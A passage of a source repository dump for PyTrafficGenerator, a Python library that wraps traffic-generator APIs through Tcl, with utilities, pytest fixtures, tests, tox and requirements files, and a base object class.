"text": "\"\"\"\nTests for TGN Tcl wrapper - the default wrapper.\n\"\"\"\nimport pytest\n\nfrom trafficgenerator.tgn_tcl import TgnTclWrapper, TgnTkThread, py_list_to_tcl_list, tcl_file_name, tcl_list_2_py_list\n\n\[email protected]\ndef tcl(logger):\n yield TgnTclWrapper(logger)\n\n\[email protected]\ndef multi_thread_tcl(logger):\n tcl_interp = TgnTkThread()\n tcl_interp.start()\n yield TgnTclWrapper(logger, tcl_interp)\n tcl_interp.stop()\n\n\ndef test_list(tcl):\n \"\"\" Test Python->Tcl and Tcl->Python list conversion. \"\"\"\n\n py_list = [\"a\", \"b b\"]\n tcl_list_length = tcl.eval(\"llength \" + py_list_to_tcl_list(py_list))\n assert int(tcl_list_length) == 2\n\n tcl_list = \"{a} {b b}\"\n python_list = tcl_list_2_py_list(tcl_list)\n assert len(python_list) == 2\n assert type(python_list[0]) is str\n assert type(python_list[1]) is str\n\n tcl_list = \"{{a} {b b}}\"\n python_list = tcl_list_2_py_list(tcl_list)\n assert len(python_list) == 2\n assert type(python_list[0]) is str\n assert type(python_list[1]) is str\n\n tcl_list = \"\"\n assert len(tcl_list_2_py_list(tcl_list)) == 0\n\n tcl_list = \"{}\"\n assert len(tcl_list_2_py_list(tcl_list)) == 0\n\n tcl_list = '[[\"a\"], [\"b\", \"b\"]]'\n assert len(tcl_list_2_py_list(tcl_list)) == 2\n\n\ndef test_file_name():\n \"\"\" Test Tcl file names normalization. \"\"\"\n assert tcl_file_name(\"a\\\\b/c\").strip() == \"{a/b/c}\"\n\n\[email protected](\"Throws Tcl_AsyncDelete: async handler deleted by the wrong thread which fails tox.\")\ndef test_puts(multi_thread_tcl):\n \"\"\" Test multi threaded Tcl \"\"\"\n assert multi_thread_tcl.eval('set dummy \"hello world\"') == \"hello world\"\n"
},
{
"alpha_fraction": 0.6583427786827087,
"alphanum_fraction": 0.6654369831085205,
"avg_line_length": 28.86440658569336,
"blob_id": "675eb563573edff55a360e8efb42fbd8528d36b2",
"content_id": "b65bc717ce7715bc7b346b81ace1769b1ad5456c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3524,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 118,
"path": "/trafficgenerator/tgn_utils.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTGN projects utilities and errors.\n\"\"\"\nimport importlib.util\nimport logging\nfrom collections.abc import Iterable\nfrom enum import Enum\nfrom os import path\nfrom types import ModuleType\nfrom typing import Optional\n\n\nclass ApiType(Enum):\n \"\"\" List TGN API types. \"\"\"\n\n tcl = 1\n python = 2\n rest = 3\n socket = 4\n\n\nclass TgnError(Exception):\n \"\"\" Base exception for traffic generator exceptions. \"\"\"\n\n pass\n\n\ndef flatten(x: list) -> list:\n \"\"\"Recursievely flatten embedded list into single list.\n\n :param x: list to flatten.\n \"\"\"\n if isinstance(x, Iterable):\n return [a for i in x for a in flatten(i)]\n else:\n return [x]\n\n\ndef is_true(str_value: str) -> bool:\n \"\"\"Returns True if string represents True value else return False.\n\n :param str_value: String to evaluate.\n \"\"\"\n return str_value.lower() in (\"true\", \"yes\", \"1\", \"::ixnet::ok\")\n\n\ndef is_false(str_value: str) -> bool:\n \"\"\"Returns True if string represents False value else return True.\n\n :param str_value: String to evaluate.\n \"\"\"\n return str_value.lower() in (\"false\", \"no\", \"0\", \"null\", \"none\", \"::ixnet::obj-null\")\n\n\ndef is_local_host(location: str) -> bool:\n \"\"\"Returns True if ip represents localhost or offline else return False.\n\n :param location: Location string in the format ip[/slot[/port]].\n \"\"\"\n return any(x in location.lower() for x in (\"localhost\", \"127.0.0.1\", \"offline\", \"null\"))\n\n\ndef is_ipv4(str_value: str) -> bool:\n \"\"\"Returns True if string represents IPv4 else return False.\n\n :param str_value: String to evaluate.\n \"\"\"\n return str_value.lower() in (\"ipv4\", \"ipv4if\")\n\n\ndef is_ipv6(str_value: str) -> bool:\n \"\"\"Returns True if string represents IPv6 else return False.\n\n :param str_value: String to evaluate.\n \"\"\"\n return str_value.lower() in (\"ipv6\", \"ipv6if\")\n\n\ndef is_ip(str_value: str) -> bool:\n \"\"\"Returns True if string represents and IP address (either IPv4 or IPv6), else False.\n\n :param str str_value: String to evaluate.\n \"\"\"\n return is_ipv4(str_value) or is_ipv6(str_value)\n\n\ndef new_log_file(logger, suffix: str, file_type: Optional[str] = \"tcl\") -> logging.Logger:\n \"\"\"Create new logger and log file from existing logger.\n\n The new logger will be create in the same directory as the existing logger file and will be named as the existing\n log file with the requested suffix.\n\n :param logger: existing logger\n :param suffix: string to add to the existing log file name to create the new log file name.\n :param file_type: logger file type (tcl. txt. etc.)\n \"\"\"\n file_handler = None\n for handler in logger.handlers:\n if isinstance(handler, logging.FileHandler):\n file_handler = handler\n new_logger = logging.getLogger(file_type + suffix)\n if file_handler:\n logger_file_name = path.splitext(file_handler.baseFilename)[0]\n tcl_logger_file_name = logger_file_name + \"-\" + suffix + \".\" + file_type\n new_logger.addHandler(logging.FileHandler(tcl_logger_file_name, \"w\"))\n new_logger.setLevel(logger.getEffectiveLevel())\n return new_logger\n\n\ndef get_test_config(test_config_path: str) -> ModuleType:\n \"\"\"Import tests configuration modeule from path.\n\n :param test_config_path: Full path to test configuration module.\n \"\"\"\n spec = importlib.util.spec_from_file_location(\"test_config\", test_config_path)\n test_config = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(test_config)\n return test_config\n"
},
{
"alpha_fraction": 0.6763157844543457,
"alphanum_fraction": 0.7552631497383118,
"avg_line_length": 26.14285659790039,
"blob_id": "5d59739689768dee496ec09f35d842ffb862fd32",
"content_id": "3b3fdb51dd9559f5d37def862bceb48181188a66",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 380,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 14,
"path": "/tox-ci.ini",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "; Tox configuration for CI testing. For manual testing use tox.ini (default).\n; TODO: Implement.\n\n[tox]\nenvlist = py37,py37_64,py38,py38_64,py39,py39_64\nskip_missing_interpreters=True\n\n[testenv]\nbasepython=\n py37: C:\\Python\\Python371\\python.exe\n py39_64: C:\\Python\\Python391\\python.exe\n\ndeps = -r{toxinidir}/requirements-dev.txt\ncommands=pytest --cov=trafficgenerator tests\n"
},
{
"alpha_fraction": 0.6726342439651489,
"alphanum_fraction": 0.6726342439651489,
"avg_line_length": 25.066667556762695,
"blob_id": "5c6c1560240f52e7f52571cbde827cdf2e854e76",
"content_id": "f4a8f54da90df02515e3bd8dae12280a3ca14511",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 15,
"path": "/trafficgenerator/tgn_app.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nBase classes and utilities for TGN applications classes.\n\"\"\"\nimport logging\n\nfrom trafficgenerator.tgn_utils import ApiType\n\n\nclass TgnApp:\n \"\"\" Base class for all TGN applications classes. \"\"\"\n\n def __init__(self, logger: logging.Logger, api_wrapper: ApiType) -> None:\n \"\"\" Initialize logger and API wrapper. \"\"\"\n self.logger = logger\n self.api = api_wrapper\n"
},
{
"alpha_fraction": 0.7108339667320251,
"alphanum_fraction": 0.7108339667320251,
"avg_line_length": 36.18840408325195,
"blob_id": "95dc1291100d887b7e63b8a056732cf6df54bd75",
"content_id": "24fb664cf822169aa6b19a5dac9d206212f07514",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2566,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 69,
"path": "/trafficgenerator/tgn_conftest.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nShared utilities for pytest conftest.\n\"\"\"\nimport logging\nimport sys\nfrom pathlib import Path\n\nimport pytest\nfrom _pytest.config.argparsing import Parser\nfrom _pytest.fixtures import SubRequest\nfrom _pytest.python import Metafunc\n\nfrom trafficgenerator.tgn_utils import ApiType, get_test_config\n\n\ndef tgn_pytest_addoption(parser: Parser, tgn_config: str) -> None:\n \"\"\"Add options to allow the user to determine which APIs and servers to test.\n\n :param parser: pytest parser to config.\n :param tgn_config: Full path to test configuration module.\n \"\"\"\n if Path(tgn_config).exists():\n test_config = get_test_config(tgn_config)\n tgn_api = test_config.api\n tgn_server = test_config.server\n else:\n tgn_api = None\n tgn_server = None\n tgn_config = None\n parser.addoption(\"--tgn-api\", action=\"append\", default=tgn_api, help=\"api options: rest or tcl, where applicable\")\n parser.addoption(\"--tgn-server\", action=\"append\", default=tgn_server, help=\"server name in the configuration file\")\n parser.addoption(\"--tgn-config\", action=\"store\", default=tgn_config, help=\"path to configuration file\")\n\n\ndef pytest_generate_tests(metafunc: Metafunc) -> None:\n \"\"\"Generate tests for each API and server from pytest options.\n\n Both options has defaults, if the user adds the same option it will be duplicated, so we remove it.\n \"\"\"\n if \"api\" in metafunc.fixturenames:\n metafunc.parametrize(\"api\", list(set(metafunc.config.getoption(\"--tgn-api\"))), indirect=True)\n metafunc.parametrize(\"server\", list(set(metafunc.config.getoption(\"--tgn-server\"))), indirect=True)\n\n\[email protected](scope=\"session\")\ndef logger() -> logging.Logger:\n \"\"\" Yields configured logger. \"\"\"\n logger = logging.getLogger(\"tgn\")\n logger.setLevel(logging.DEBUG)\n logger.addHandler(logging.StreamHandler(sys.stdout))\n yield logger\n\n\[email protected](scope=\"session\")\ndef api(request: SubRequest) -> ApiType:\n \"\"\" Yield API type - generate tests will generate API types based on the api option. \"\"\"\n yield ApiType[request.param]\n\n\[email protected](scope=\"session\")\ndef server(request: SubRequest) -> str:\n \"\"\" Yields server name in confing file - generate tests will generate servers based on the server option. \"\"\"\n yield request.param\n\n\[email protected](scope=\"session\")\ndef server_properties(request: SubRequest, server: str) -> dict:\n \"\"\" Yields server properties dict for the requested server. \"\"\"\n yield get_test_config(request.config.getoption(\"--tgn-config\")).server_properties[server]\n"
},
{
"alpha_fraction": 0.7972028255462646,
"alphanum_fraction": 0.8041958212852478,
"avg_line_length": 8,
"blob_id": "8711a3b8d1fbfe153f973369e1a494e19affd4b5",
"content_id": "2e49f9594d43deda8f1a316fbaed9f7e79621a06",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 143,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 16,
"path": "/requirements-dev.txt",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "-r requirements.txt\n\n# Testing\npytest\npytest-cov\npytest-flake8\npytest-isort\ntox\n\n# Packaging\nwheel\nsetuptools-scm\ntwine\n\n# Documentation\nmkdocs"
},
{
"alpha_fraction": 0.5958533883094788,
"alphanum_fraction": 0.5971674919128418,
"avg_line_length": 29.440000534057617,
"blob_id": "2a5793300c22280d368204043a64399c59e9ed20",
"content_id": "9511a74a943a4215e9af0eaf14d3b4ec87454de3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6849,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 225,
"path": "/trafficgenerator/tgn_tcl.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nBase class and utilities for TGN Python Tcl wrapper.\n\"\"\"\nimport json\nimport logging\nimport re\nimport time\nfrom os import path\nfrom queue import Queue\nfrom threading import Thread\nfrom typing import Dict, List, Optional\n\nfrom trafficgenerator.tgn_object import TgnObject\nfrom trafficgenerator.tgn_utils import new_log_file\n\n# Tcl is must only if the test chooses to use Tcl API so it is OK if Tcl is not installed (e.g for some Linux\n# installations). If Tcl interpreter is required and not installed it will fail anyway...\ntry:\n from tkinter import Tcl\n\n from _tkinter import TclError\n\n tcl_interp_g: Optional[Tcl] = None\n \"\"\" Global Tcl interpreter for Tcl based utilities. Does not log its operations. \"\"\"\nexcept ModuleNotFoundError:\n pass\n\n\ndef tcl_str(string: str = \"\") -> str:\n \"\"\"Returns Tcl string surrounded by {}\n\n :param string: Python string.\n \"\"\"\n return \" {\" + string + \"} \"\n\n\ndef tcl_file_name(name: str) -> str:\n \"\"\"Returns normalized file name with forward slashes.\n\n :param name: file name.\n \"\"\"\n return tcl_str(path.normpath(name).replace(\"\\\\\", \"/\"))\n\n\ndef get_args_pairs(arguments: Dict[str, object]) -> str:\n \"\"\"Returns Tcl list of argument pairs <-key, value> to be used in TGN API commands.\n\n :param arguments: Python dictionary of TGN API command arguments <key, value>.\n \"\"\"\n return \" \".join(\" \".join([\"-\" + k, tcl_str(str(v))]) for k, v in arguments.items())\n\n\ndef build_obj_ref_list(objects: List[TgnObject]) -> str:\n \"\"\"Returns Tcl list of all requested objects references.\n\n :param objects: Python list of requested objects.\n \"\"\"\n return \" \".join([o.ref for o in objects])\n\n\ndef tcl_list_2_py_list(tcl_list: str) -> list:\n \"\"\"Recursievely convert embedded Tcl list to embedded Python list using Tcl interpreter.\n\n :param str tcl_list: string representing the Tcl list.\n \"\"\"\n\n if not tcl_list:\n return []\n\n try:\n return json.loads(tcl_list)\n except json.decoder.JSONDecodeError:\n try:\n python_list = tcl_interp_g.eval(\"join \" + tcl_list + \" LiStSeP\").split(\"LiStSeP\")\n except TclError:\n python_list = tcl_interp_g.eval(\"join \" + tcl_str(tcl_list) + \" LiStSeP\").split(\"LiStSeP\")\n if len([i for i in python_list if \"{\" in i]) == 0:\n return python_list\n return [tcl_list_2_py_list(e) for e in python_list]\n\n\ndef py_list_to_tcl_list(py_list: list) -> str:\n \"\"\"Convert Python list to Tcl list using Tcl interpreter.\n\n :param py_list: Python list.\n \"\"\"\n py_list_str = [str(s) for s in py_list]\n return tcl_str(tcl_interp_g.eval(\"split\" + tcl_str(\"\\t\".join(py_list_str)) + \"\\\\t\"))\n\n\nclass TgnTk:\n \"\"\" Native Python Tk interpreter. \"\"\"\n\n def __init__(self):\n self.tcl = Tcl()\n\n def eval(self, command):\n return self.tcl.eval(command)\n\n\nclass TgnTkThread(Thread):\n \"\"\" Native Python Tk interpreter with multithreading. \"\"\"\n\n _is_running = True\n\n def __init__(self):\n super().__init__()\n self.in_q = Queue()\n self.out_q = Queue()\n self.tcl = None\n\n def run(self):\n if not self.tcl:\n self.tcl = Tcl()\n while self._is_running:\n if not self.in_q.empty():\n command = self.in_q.get()\n try:\n rc = self.tcl.eval(command)\n self.out_q.put(rc)\n except Exception as e:\n self.out_q.put(e)\n time.sleep(1)\n\n def stop(self):\n self._is_running = False\n\n def eval(self, command):\n self.in_q.put(command)\n while self.out_q.empty():\n time.sleep(1)\n rc = self.out_q.get()\n if isinstance(rc, Exception):\n raise rc\n return rc\n\n\nclass TgnTclConsole:\n \"\"\"Tcl interpreter over console.\n\n Current implementation is a sample extracted from actual project where the console is telnet to Windows machine.\n \"\"\"\n\n def __init__(self, con, tcl_exe) -> None:\n \"\"\"Start Tcl interpreter on console.\n\n :param con: console.\n :param tcl_exe: full path to Tcl exe.\n \"\"\"\n super().__init__()\n self._con = con\n self._con.set_prompt_match_expression(\"% \")\n self._con.send_cmd(tcl_exe)\n\n def eval(self, command: str) -> str:\n \"\"\"Evaluate Tcl command.\n\n :param command: command to evaluate.\n \"\"\"\n # Some operations (like take ownership) may take long time.\n con_command_out = self._con.send_cmd(command, timeout=256)\n if \"ERROR_SEND_CMD_EXIT_DUE_TO_TIMEOUT\" in con_command_out:\n raise TclError(f\"{command} - command timeout\")\n command = command.replace(\"\\\\\", \"/\")\n con_command_out = con_command_out.replace(\"\\\\\", \"/\")\n command = command.replace(\"(\", r\"\\(\").replace(\")\", r\"\\)\")\n command = command.replace(\"{\", r\"\\{\").replace(\"}\", r\"\\}\")\n m = re.search(command + \"(.*)\" + \"%\", con_command_out, re.DOTALL)\n command_out = m.group(1).strip()\n if \"couldn't read file\" in command_out or \"RuntimeError\" in command_out:\n raise TclError(command_out)\n return command_out\n\n def disconnect(self) -> None:\n self._con.set_prompt_match_expression(\"C:.*>\")\n self._con.send_cmd(\"exit\")\n\n\nclass TgnTclWrapper:\n \"\"\" Tcl connectivity for TGN projects. \"\"\"\n\n def __init__(self, logger: logging.Logger, tcl_interp=None):\n \"\"\"Init Python Tk package.\n\n Add logger to log Tcl commands only.\n This creates a clean Tcl script that can be used later for debug.\n We assume that there might have both multiple Tcl sessions simultaneously so we add suffix to create\n multiple distinguished Tcl scripts.\n \"\"\"\n\n if not logger:\n logger = logging.getLogger(\"dummy\")\n self.logger = logger\n self.tcl_script = new_log_file(self.logger, self.__class__.__name__)\n\n if not tcl_interp:\n self.tcl_interp = TgnTk()\n else:\n self.tcl_interp = tcl_interp\n global tcl_interp_g\n tcl_interp_g = self.tcl_interp\n self.rc = None\n\n def eval(self, command):\n \"\"\"Execute Tcl command.\n\n Write the command to tcl script (.tcl) log file.\n Execute the command.\n Write the command and the output to general (.txt) log file.\n\n :param command: Command to execute.\n :returns: command raw output.\n \"\"\"\n\n if self.logger.handlers:\n self.logger.debug(command)\n if self.tcl_script:\n self.tcl_script.info(command)\n self.rc = self.tcl_interp.eval(command)\n if self.logger.handlers:\n self.logger.debug(\"\\t\" + self.rc)\n return self.rc\n\n def source(self, script_file):\n self.eval(\"source \" + tcl_file_name(script_file))\n"
},
{
"alpha_fraction": 0.738095223903656,
"alphanum_fraction": 0.738095223903656,
"avg_line_length": 13,
"blob_id": "40d0b08e46bb05d19b29de33ff831903ee878c4d",
"content_id": "c8d2f7ed279b5c81fa3063c0c80407271c84d044",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 42,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 3,
"path": "/docs/getting_started.md",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "# Getting Started\n---\nUnder construction.\n"
},
{
"alpha_fraction": 0.7352941036224365,
"alphanum_fraction": 0.7352941036224365,
"avg_line_length": 18.75,
"blob_id": "310f6f46024fa2a425ea34f455bc66e836e3ec56",
"content_id": "6c7807691d3857745be557e9b3c43dc5a69c2708",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 238,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 12,
"path": "/tests/conftest.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\nimport logging\nimport sys\n\nimport pytest\n\n\[email protected](scope='session')\ndef logger():\n logger = logging.getLogger('tgn')\n logger.setLevel(logging.DEBUG)\n logger.addHandler(logging.StreamHandler(sys.stdout))\n yield logger\n"
},
{
"alpha_fraction": 0.8382353186607361,
"alphanum_fraction": 0.8382353186607361,
"avg_line_length": 21.66666603088379,
"blob_id": "5055d42641fc212bd0cd4fdf1b327d853bd8d661",
"content_id": "b68e5a04d7f6a91eaa8d8e8724e4dbadc2dda53c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 68,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 3,
"path": "/docs/index.md",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "Welcome to PyTrafficGenerator Documentation\n---\nUnder construction.\n"
},
{
"alpha_fraction": 0.6096330881118774,
"alphanum_fraction": 0.6115679740905762,
"avg_line_length": 33.29146957397461,
"blob_id": "59a959baa66a3ed7b811a56612b9711c5117418c",
"content_id": "4db2fadfd461f74fda2ec8e2a8ce0cd71942afc7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14471,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 422,
"path": "/trafficgenerator/tgn_object.py",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "\"\"\"\nBase class and utilities for all TGN objects.\n\"\"\"\nfrom __future__ import annotations\n\nimport gc\nimport json\nfrom abc import ABC, abstractmethod\nfrom collections import OrderedDict\nfrom typing import Dict, List, Optional, Type\n\nfrom trafficgenerator.tgn_utils import TgnError\n\n\n# Workaround IXN object reference bugs.\n# Object reference with float sequential number instead of integer.\n# For example, endpointset->sources attribute might return:\n# vport:1/protocols/bgp/neighborRange:1.0/routeRange:1.\n# Object reference with neighborPairs (plural) instead of neighborPair (single).\ndef _wa_norm_obj_ref(obj_ref):\n return obj_ref.replace(\".0\", \"\").replace(\"neighborPairs:\", \"neighborPair:\")\n\n\nclass TgnObjectsDict(OrderedDict):\n \"\"\"Dictionary to map from TgnObjects to whatever data.\n\n Dictionary keys must be TgnObject but then it can be accessed by the object itself, the object reference or the\n object name.\n \"\"\"\n\n def __setitem__(self, key, value):\n if not isinstance(key, TgnObject):\n raise TgnError(f\"tgn_object_dict keys must be TgnObject, not {type(key)}\")\n return OrderedDict.__setitem__(self, key, value)\n\n def __getitem__(self, key):\n if key in self.keys():\n return OrderedDict.__getitem__(self, key)\n else:\n for obj in self:\n if obj.name == key or obj.ref == key:\n return OrderedDict.__getitem__(self, obj)\n\n def dumps(self, indent=1):\n \"\"\"Returns nested string representation of the dictionary (like json.dumps).\n\n :param indent: indentation level.\n \"\"\"\n str_keys_dict = OrderedDict({str(k): v for k, v in self.items()})\n for k, v in str_keys_dict.items():\n if isinstance(v, dict):\n str_keys_dict[k] = OrderedDict({str(k1): v1 for k1, v1 in v.items()})\n for k1, v1 in str_keys_dict[k].items():\n if isinstance(v1, dict):\n str_keys_dict[k][k1] = OrderedDict({str(k2): v2 for k2, v2 in v1.items()})\n return json.dumps(str_keys_dict, indent=indent)\n\n\nclass TgnSubStatsDict(TgnObjectsDict):\n \"\"\"Dictionary that assumes it contains sub dictionary so if a requested key does not exit it will assume it is a\n key of the first sub-dictionary.\n\n Port and stream statistics should be hierarchical - {rx port, {key, value}} - to support multicast traffic.\n However, in most cases there is only one RX port so the rx port level is redundant.\n \"\"\"\n\n def __getitem__(self, key):\n if super().__getitem__(key) is not None:\n return super().__getitem__(key)\n else:\n if len(self) > 1:\n raise KeyError(\"multiple values\")\n return list(self.values())[0][key]\n\n\nclass TgnObject(ABC):\n \"\"\" Base class for all TGN classes. \"\"\"\n\n objects = OrderedDict()\n \"\"\" Dictionary of child objects <object reference: object name>. \"\"\"\n\n def __init__(self, parent: TgnObject, **data: str) -> None:\n \"\"\"Create new TGN object in the API.\n\n If object does not exist on the chassis, create it on the chassis as well.\n\n :param parent: object parent. If == None the api and logger attributes must be set explicitly by the caller.\n \"\"\"\n\n super().__init__()\n self._data = {}\n self.objects = OrderedDict()\n self._set_data(**data)\n self._data[\"parent\"] = parent\n if self.parent:\n self.api = self.parent.api\n self.logger = self.parent.logger\n if \"objRef\" not in self._data:\n self._data[\"objRef\"] = self._create()\n if \"name\" not in self._data:\n self._data[\"name\"] = self.ref\n if self._data.get(\"parent\", None):\n # todo: make sure each object has parent and test only for None parents (STC project and IXN root).\n self._data[\"parent\"].objects[self.ref] = self\n\n def __str__(self) -> str:\n return self.name\n\n def get_child(self, *types: str) -> Optional[TgnObject]:\n \"\"\"Returns the first (and for most useful cases only) child of the requested type(s).\n\n :param types: list of requested types.\n \"\"\"\n children = list(self.get_children(*types))\n return children[0] if children else None\n\n def get_object_by_ref(self, obj_ref):\n \"\"\"\n :param obj_ref: requested object reference.\n :return: the first object with the requested object reference in the object branch.\n \"\"\"\n return self._get_object_by_key(\"objRef\", _wa_norm_obj_ref(obj_ref))\n\n def get_object_by_name(self, obj_name):\n \"\"\"\n :param obj_name: requested object name.\n :return: the first object with the requested object name in the object branch.\n \"\"\"\n return self._get_object_by_key(\"name\", obj_name)\n\n def _get_object_by_key(self, key, value, *types):\n if self._data[key] == value and (types and self.ref in types or not types):\n return self\n else:\n if not types:\n children = self.objects.values()\n else:\n children = self.get_objects_by_type(*types)\n for child in children:\n obj = child._get_object_by_key(key, value, *types)\n if obj is not None:\n return obj\n\n def get_objects_by_type(self, *types) -> List[TgnObject]:\n \"\"\"Returned objects stored in memory (without re-reading them from the TGN).\n\n Use this method for fast access to objects in case of static configurations.\n\n :param types: requested object types.\n \"\"\"\n if not types:\n return list(self.objects.values())\n types_l = [o.lower() for o in types]\n return [o for o in self.objects.values() if o.type.lower() in types_l]\n\n def get_object_by_type(self, *types: str) -> Optional[TgnObject]:\n \"\"\"Return the first child object stored in memory (without re-reading them from the TGN).\n\n :param types: requested object types.\n \"\"\"\n children = self.get_objects_by_type(*types)\n return children[0] if any(children) else None\n\n def get_objects_by_type_in_subtree(self, *types):\n \"\"\"\n :param types: requested object types.\n :return: all children of the specified types.\n \"\"\"\n\n typed_objects = self.get_objects_by_type(*types)\n for child in self.objects.values():\n typed_objects += child.get_objects_by_type_in_subtree(*types)\n return typed_objects\n\n def get_objects_or_children_by_type(self, *types):\n \"\"\"Get objects if children already been read or get children.\n\n Use this method for fast access to objects in case of static configurations.\n\n :param types: requested object types.\n :return: all children of the specified types.\n \"\"\"\n\n objects = self.get_objects_by_type(*types)\n return objects if objects else self.get_children(*types)\n\n def get_object_or_child_by_type(self, *types):\n \"\"\"Get object if child already been read or get child.\n\n Use this method for fast access to objects in case of static configurations.\n\n :param types: requested object types.\n :return: all children of the specified types.\n \"\"\"\n\n objects = self.get_objects_or_children_by_type(*types)\n return objects[0] if any(objects) else None\n\n def get_objects_with_object(self, obj_type, *child_types):\n \"\"\"\n :param obj_type: requested object type.\n :param child_types: requested child types.\n :return: all children of the requested type that have the requested child types.\n \"\"\"\n\n return [o for o in self.get_objects_by_type(obj_type) if o.get_objects_by_type(*child_types)]\n\n def get_objects_without_object(self, obj_type, *child_types):\n \"\"\"\n :param obj_type: requested object type.\n :param child_types: unrequested child types.\n :return: all children of the requested type that do not have the unrequested child types.\n \"\"\"\n return [o for o in self.get_objects_by_type(obj_type) if not o.get_objects_by_type(*child_types)]\n\n def get_objects_with_attribute(self, obj_type: str, attribute: str, value: str) -> List[TgnObject]:\n \"\"\"Returns all children of the requested type that have the requested attribute == requested value.\n\n :param obj_type: requested object type.\n :param attribute: requested attribute.\n :param value: requested attribute value.\n \"\"\"\n return [o for o in self.get_objects_by_type(obj_type) if o.get_attribute(attribute) == value]\n\n def get_ancestor_object_by_type(self, obj_type):\n \"\"\"\n :param obj_type: requested ancestor type.\n :return: the ancestor of the object who's type is obj_type if exists else None.\n \"\"\"\n\n if self.type.lower() == obj_type.lower():\n return self\n else:\n if not self.parent:\n return None\n return self.parent.get_ancestor_object_by_type(obj_type)\n\n def del_object_from_parent(self):\n \"\"\" Delete object from parent object. \"\"\"\n if self.parent:\n self.parent.objects.pop(self.ref)\n\n def del_objects_by_type(self, type_):\n \"\"\"Delete all children objects.\n\n :param type_: type of objects to delete.\n \"\"\"\n [o.del_object_from_parent() for o in self.get_objects_by_type(type_)]\n\n def get_object_from_attribute(self, attribute: str) -> Optional[TgnObject]:\n \"\"\"Read attribute as reference and return an object for it.\n\n Return object for the reference exists in the objects tree, else create new one under the self object.\n Return None for empty attribute.\n\n :param attribute: attribute containing the object references.\n \"\"\"\n objects = self.get_objects_from_attribute(attribute)\n return objects[0] if objects else None\n\n @classmethod\n def get_objects_of_class(cls):\n \"\"\"\n :return: all instances of the requested class.\n \"\"\"\n return list(o for o in gc.get_objects() if isinstance(o, cls))\n\n #\n # Simple utilities to return object _data. Maybe it's not Pythonic (more like Java) but after\n # changing the key name couple of times I decided to go for it.\n #\n\n def obj_name(self) -> str:\n \"\"\"\n :return: object name.\n \"\"\"\n return self._data[\"name\"]\n\n name = property(obj_name)\n\n def obj_ref(self) -> str:\n \"\"\"Object reference is unique, descriptive, ID within the objects tree.\n\n In some TGs (IxNetwork, STC, IxLoad...) the reference is maintained by the TG itself and is used for API calls.\n In others (Xena, TRex...) the reference is maintained by the TG package and may (Xena REST) or may not be used\n for API calls.\n If the reference is not used for API calls, use index or relative index for API calls.\n\n :return: object reference.\n \"\"\"\n return str(self._data[\"objRef\"])\n\n ref = property(obj_ref)\n\n def obj_type(self) -> str:\n \"\"\"\n :return: object type.\n \"\"\"\n return self._data[\"objType\"]\n\n type = property(obj_type)\n\n def obj_parent(self) -> TgnObject:\n \"\"\"\n :return: object parent.\n \"\"\"\n return self._data[\"parent\"]\n\n parent = property(obj_parent)\n\n def obj_index(self) -> str:\n \"\"\"Object index is the index string used for API calls when object reference there is not used.\n\n Object index structure is something like chassis/card/port.\n\n :return: object index.\n \"\"\"\n return str(self._data[\"index\"])\n\n index = property(obj_index)\n\n def obj_id(self) -> int:\n \"\"\"Object ID is the relative ID of the object.\n\n :return: object relative ID.\n \"\"\"\n return int(self.index.split(\"/\")[-1]) if self.index else None\n\n id = property(obj_id)\n\n #\n # Private methods.\n #\n\n def _set_data(self, **data):\n self._data.update(data)\n\n def _build_children_objs(self, child_type, children):\n children_objs = OrderedDict()\n child_obj_type = self.get_obj_class(child_type)\n for child in (c for c in children if c != \"\"):\n child_object = child_obj_type(parent=self, objRef=child, objType=child_type)\n child_object._set_data(name=child_object.get_name())\n children_objs[child_object.obj_ref()] = child_object\n self.objects.update(children_objs)\n return children_objs\n\n #\n # Abstract API methods.\n #\n\n @abstractmethod\n def _create(self, **attributes: Dict[str, object]) -> str:\n \"\"\"Create new object on the chassis and return its object reference.\n\n :param attributes: additional attributes for the create command.\n \"\"\"\n pass\n\n @abstractmethod\n def get_name(self) -> str:\n \"\"\" Get object name. \"\"\"\n pass\n\n 